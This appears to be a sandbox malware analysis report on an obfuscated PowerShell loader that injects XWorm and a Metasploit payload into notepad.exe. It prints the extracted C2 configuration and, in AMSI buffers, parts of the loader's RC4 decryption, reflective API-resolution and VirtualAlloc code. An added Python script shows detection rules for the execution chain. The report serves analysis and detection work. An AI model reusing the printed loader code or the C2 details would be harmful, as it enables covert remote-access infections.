
Windows Analysis Report
quark.ps1

Overview

General Information

Sample name: quark.ps1
Analysis ID: 1429328
MD5: 918d10fa6fd003a0bea73d2ba50538e0
SHA1: a089fbb17927d4a84d25e910b3d0cc7ea12faf1f
SHA256: 4e842547867c928696600f51943bb9611adb9afc4741358fd5a97f28dcabfcf5
Tags: ps1

Detection

Metasploit, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected MetasploitPayload
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Hijacks the control flow in another process
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • notepad.exe (PID: 384 cmdline: C:\Windows\System32\notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
Extracted malware configuration (XWorm): {"C2 url": ["jdokds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Yara matches, memory dumps
Source | Rule | Description | Author
00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x70b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x714d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7262:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6d5c:$cnc4: POST / HTTP/1.1
00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x12f28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1bd44:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12fc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1bdfc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x130da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1bf2c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x12bd4:$cnc4: POST / HTTP/1.1
00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x9aaf:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0xc517:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
(2 further entries not shown)

Yara matches, unpacked PEs
Source | Rule | Description | Author
4.2.notepad.exe.28858ef0000.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.2.notepad.exe.28858ef0000.0.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x70b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x714d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7262:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6d5c:$cnc4: POST / HTTP/1.1
4.2.notepad.exe.28858ef0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.2.notepad.exe.28858ef0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x52b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x534d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5462:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x4f5c:$cnc4: POST / HTTP/1.1
4.2.notepad.exe.28858f7ce78.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(3 further entries not shown)

Yara matches, AMSI buffers
Source | Rule | Description | Author
amsi64_6688.amsi.csv | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security

              System Summary

              barindex
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", ProcessId: 6688, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", ProcessId: 6688, ProcessName: powershell.exe
              No Snort rule has matched


              AV Detection

              barindex
Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["jdokds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: jdokds.duckdns.org | VirusTotal: Detection: 5%
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack | String decryptor: jdokds.duckdns.org
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack | String decryptor: 8895
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack | String decryptor: <123456789>
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack | String decryptor: <Xwormmm>
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack | String decryptor: USB.exe

              Networking

              barindex
Source: Malware configuration extractor | URLs: jdokds.duckdns.org
Source: powershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: quark.ps1 | String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout

              System Summary

              barindex
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d, Author: unknown
Source: C:\Windows\System32\notepad.exe | Code function: 4_2_000002885743AB03
Source: C:\Windows\System32\notepad.exe | Code function: 4_2_000002885743AF23
Source: C:\Windows\System32\notepad.exe | Code function: 4_2_0000028857439EDB
Source: C:\Windows\System32\notepad.exe | Code function: 4_2_000002885743B7E3
Source: C:\Windows\System32\notepad.exe | Code function: 4_2_000002885743B35B
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\notepad.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
Source: C:\Windows\System32\notepad.exe | Mutant created: \Sessions\1\BaseNamedObjects\fR94ukDUyBXXff7e
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igiqhzjc.zdy.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface (buffer as captured; line breaks restored, truncated at both ends in the report):
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
Set-StrictMode -Version 2
$DoIt = @'
function Crypt {
    param ( [byte[]]$key, [byte[]]$data )
    $s = 0..255
    $j = 0
    for ($i = 0; $i -lt 256; $i++) {
        $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256
        $s[$i], $s[$j] = $s[$j], $s[$i]
    }
    $i = $j = 0
    $output = [byte[]]::new($data.Length)
    for ($count = 0; $count -lt $data.Length; $count++) {
        $i = ($i + 1) % 256
        $j = ($j + $s[$i]) % 256
        $s[$i], $s[$j] = $s[$j], $s[$i]
        $k = $s[($s[$i] + $s[$j]) % 256]
        $output[$count] = $data[$count] -bxor $k
    }
    $output
}
function func_get_proc_address {
    Param($var_module, $var_procedure)
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
    Param(
        [Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,
        [Parameter(Position = 1)][Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}
[Byte[]]$encryptedData = [System.Convert]::FromBase64String('o5n2vNkL79OCoYlfLSFN/IuQ283D4dAEXAStICCsUC5SANvTfAb39ousjEjEJkiy/SKPGXSKZvfiS5taCPT2I7EqQsX1fSmhXcJixqCDsu15NCSldawT+rF/3X5VypITgREh7IfUPQjssI/QaBwK+dfTkWXKOxG78vK7H+REbD6/4fmTTlYJ/tIJtns3RMddwlXp3C2CNom6qIjuW+EBO4pkoeMmXKnUesGnAZ47byXdRi3BSNgccd66BmWn0pWbJ8R7gQI/fgEIJwNehWP++2ExNjA1IvLwoe8HWpSrrilboUNz48UE+KNWAVS3sFImp0P8ImVNsU69aXhbHMv34oFmisCAUj0qh1v4MA+MP8aPD+x89zsvPFHEBJPPH+L0xmbcRQP/iP/6tqpPcZkJG0N9yUCIedU95D90EVy1HO4HFNWJVVo6Dft5gX5aW9BW9uKUTsv/iICmX0hpERACl/VVeE/uPD354eL3ZBhWW02aikpEXW/p55q7cp6OdrCuwi2uFmTRQTv7OH/Ej7AAROciidc/6L+5ZzDDuPyd8iGdzqsY18EAI+n267EuQOppcFkcfQWgmSnssJwLHLtE6fn63cGTpPwSZgafH8Nwc1tk0xsrqACvbFkS4IkbepT/mjX5YSs1kaFsFCxrztw6CFsS9V4dv3M2OkaBvw93O3C2cxKnRjJZjkEQSNfQcz6w6JW9pR103LUS2VgT8uflCLQnF5E4Ra9n9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, policymanager.dll, msvcp110_win.dll, taskflowdataengine.dll, wintypes.dll, cdp.dll, umpdc.dll, dsreg.dll, cryptsp.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, rsaenh.dll, cryptbase.dll, amsi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, urlmon.dll, iertutil.dll, netutils.dll, wininet.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, kdscli.dll, ntasn1.dll, ncrypt.dll
Source: C:\Windows\System32\notepad.exe | Sections loaded, in order: wininet.dll, mscoree.dll, amsi.dll, wldp.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, wtsapi32.dll, winsta.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, userenv.dll, profapi.dll, sspicli.dll, version.dll
Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: quark.ps1 | Static file information: File size 13631488 > 1048576
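Three telemetry points in this section carry the whole execution chain: the Sigma hit on `-ExecutionPolicy unrestricted`, powershell.exe spawning a bare `notepad.exe` (the suspended host for the APC injection reported under Signatures), and the CLR (mscoree.dll) plus amsi.dll appearing in notepad.exe's image loads, which a native Win32 editor never does on its own. The block below is an added example, not part of the Joe Sandbox report: it runs those rules over Sysmon-style events (ID 1 process create, ID 7 image load, ID 10 process access) constructed from the process tree and image-load list above. The process-access event with PROCESS_ALL_ACCESS and the benign control process are assumptions; Sysmon does not log the APC queueing itself, so the write rights on the handle are used as the nearest proxy.

```python
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# GUI utilities that never load the CLR by themselves; notepad.exe is the host used here.
NON_DOTNET_HOSTS = {"notepad.exe", "calc.exe", "mspaint.exe", "write.exe"}
CLR_IMAGES = {"mscoree.dll", "clr.dll", "clrjit.dll"}
# -ExecutionPolicy plus the prefixes powershell.exe accepts (-ep, -ex, -exec ...).
INSECURE_POLICY = re.compile(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)\b", re.I)
PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x0008, 0x0020   # rights WriteProcessMemory needs

EVENTS = [  # constructed from the report's process tree and notepad.exe image loads
    {"id": 1, "pid": 6688, "ppid": 1028,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1"'},
    {"id": 1, "pid": 6464, "ppid": 6688, "image": r"C:\Windows\system32\conhost.exe",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"id": 1, "pid": 384, "ppid": 6688, "image": r"C:\Windows\System32\notepad.exe",
     "cmd": r"C:\Windows\System32\notepad.exe"},
    # Constructed (assumed): the script host opens its child with full rights.
    {"id": 10, "source_pid": 6688, "target_pid": 384, "granted_access": 0x1FFFFF},
    {"id": 7, "pid": 384, "image": r"C:\Windows\System32\notepad.exe", "loaded": r"C:\Windows\System32\wininet.dll"},
    {"id": 7, "pid": 384, "image": r"C:\Windows\System32\notepad.exe", "loaded": r"C:\Windows\System32\mscoree.dll"},
    {"id": 7, "pid": 384, "image": r"C:\Windows\System32\notepad.exe", "loaded": r"C:\Windows\System32\amsi.dll"},
    # Constructed benign control: an inventory script run under the default policy.
    {"id": 1, "pid": 7000, "ppid": 1028,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -NoProfile -File "C:\Scripts\inventory.ps1"'},
]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an unknown parent)."""
    return PureWindowsPath(path).name.lower()


def triage(events):
    """Apply the four rules and return one alert dict per hit, in event order."""
    image_of = {e["pid"]: e["image"] for e in events if e["id"] == 1}
    alerts = []
    for e in events:
        if e["id"] == 1:
            m = INSECURE_POLICY.search(e["cmd"])
            if base(e["image"]) in SCRIPT_HOSTS and m:
                alerts.append({"rule": "insecure_execution_policy", "pid": e["pid"], "detail": m.group(0)})
            parent = base(image_of.get(e["ppid"], ""))
            # A GUI binary started with no arguments at all is the injection-host pattern.
            bare = e["cmd"].strip().strip('"').lower() == e["image"].lower()
            if parent in SCRIPT_HOSTS and base(e["image"]) in NON_DOTNET_HOSTS and bare:
                alerts.append({"rule": "script_host_spawns_bare_gui_binary", "pid": e["pid"],
                               "detail": f"{parent} -> {e['cmd']}"})
        elif e["id"] == 7:
            if base(e["image"]) in NON_DOTNET_HOSTS and base(e["loaded"]) in CLR_IMAGES:
                alerts.append({"rule": "clr_loaded_in_non_dotnet_host", "pid": e["pid"],
                               "detail": base(e["loaded"])})
        elif e["id"] == 10:
            src = base(image_of.get(e["source_pid"], ""))
            need = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
            if src in SCRIPT_HOSTS and e["granted_access"] & need == need:
                alerts.append({"rule": "write_access_to_process_from_script_host", "pid": e["target_pid"],
                               "detail": f"{src} granted 0x{e['granted_access']:x}"})
    return alerts


if __name__ == "__main__":
    for a in triage(EVENTS):
        print(f"{a['rule']:<42} pid={a['pid']:<5} {a['detail']}")
```

The execution-policy rule alone is noisy on admin workstations; the value of the other three is that they fire on the child, so correlating on the parent PID of the policy hit turns four medium-confidence signals into one high-confidence chain.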

              Data Obfuscation

              barindex
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs | .Net Code: Memory
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs | .Net Code: Memory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface (truncated in report): GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
